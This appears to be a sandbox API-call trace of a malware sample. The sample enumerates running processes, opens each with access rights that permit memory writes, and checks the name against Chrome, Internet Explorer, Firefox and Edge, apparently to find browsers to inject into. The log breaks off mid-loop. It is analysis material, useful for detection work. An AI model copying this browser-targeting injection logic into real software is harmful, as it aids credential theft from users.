	[0249.484] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.484] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.484] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0249.485] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.485] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.485] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0249.486] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x9ec8
	[0249.486] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.486] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0249.486] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.486] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.486] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.486] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0249.487] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.487] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.487] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0249.488] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x9ecc
	[0249.488] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.488] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0249.488] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.488] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.488] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.488] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0249.489] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.489] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.489] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0249.490] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x9ed0
	[0249.490] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.490] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0249.490] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.490] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.490] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.490] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0249.491] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.491] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.491] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0249.492] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x9ed4
	[0249.492] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.492] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0249.493] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.493] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.493] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.493] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0249.493] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.493] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.493] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0249.494] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x9ed8
	[0249.494] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.494] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0249.495] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.495] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.495] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.495] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0249.495] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.495] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.496] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0249.496] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x9edc
	[0249.496] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.496] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0249.497] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.497] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.497] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.497] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0249.497] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.497] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.498] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0249.498] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x9ee0
	[0249.498] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.499] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0249.499] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.499] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.499] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.499] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0249.499] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.499] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.500] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0249.500] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x9ee4
	[0249.501] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.501] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0249.501] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.501] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.501] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.501] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0249.502] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.502] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.502] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0249.503] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x9ee8
	[0249.503] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.503] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0249.503] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.503] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.503] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.503] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0249.504] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.504] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.504] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0249.505] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x9eec
	[0249.505] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.505] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0249.505] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.505] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.505] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.505] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0249.506] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.506] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.506] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0249.506] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x9ef0
	[0249.507] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.507] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0249.601] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.601] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.601] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.601] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0249.602] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.602] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.602] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0249.799] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0249.799] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0249.801] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x9ef4
	[0249.801] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.801] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0249.802] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.802] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.803] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.803] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0249.803] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.803] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.804] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0249.805] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x9ef8
	[0249.805] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.805] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0249.806] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.806] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.806] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.806] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0249.807] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.807] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.807] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0249.808] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x9efc
	[0249.808] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.808] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0249.809] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.809] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.809] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.809] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0249.810] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.810] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.810] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0249.811] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x9f00
	[0249.811] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.811] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0249.812] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.812] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.812] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.812] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0249.813] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.813] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.813] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0249.814] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x9f04
	[0249.814] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.814] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0249.815] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.815] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.816] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.816] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0249.817] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.817] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.817] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0249.818] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x9f08
	[0249.819] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.819] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0249.820] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.820] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.820] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.820] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0249.820] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.821] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.821] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0249.822] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x9f0c
	[0249.822] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.822] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0249.822] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.822] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.823] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.823] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0249.823] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.823] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.824] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0249.825] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x9f10
	[0249.825] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.825] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0249.826] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.826] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.827] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.827] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0249.827] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.827] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.828] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0249.829] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x9f14
	[0249.829] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.829] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0249.829] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.829] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.830] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.830] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0249.830] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.830] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.830] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0249.831] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x9f18
	[0249.832] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.832] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0249.832] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.832] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.832] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.832] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0249.833] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.833] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.833] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0249.834] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x9f1c
	[0249.834] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.834] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0249.835] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.835] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.836] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.836] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0249.836] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.836] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.837] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0249.838] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x9f20
	[0249.838] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.838] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0249.838] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.838] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.839] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.839] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0249.840] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.840] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0249.840] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0249.841] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x9f24
	[0249.841] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.841] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0249.841] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.841] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0249.842] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0249.842] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0249.842] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
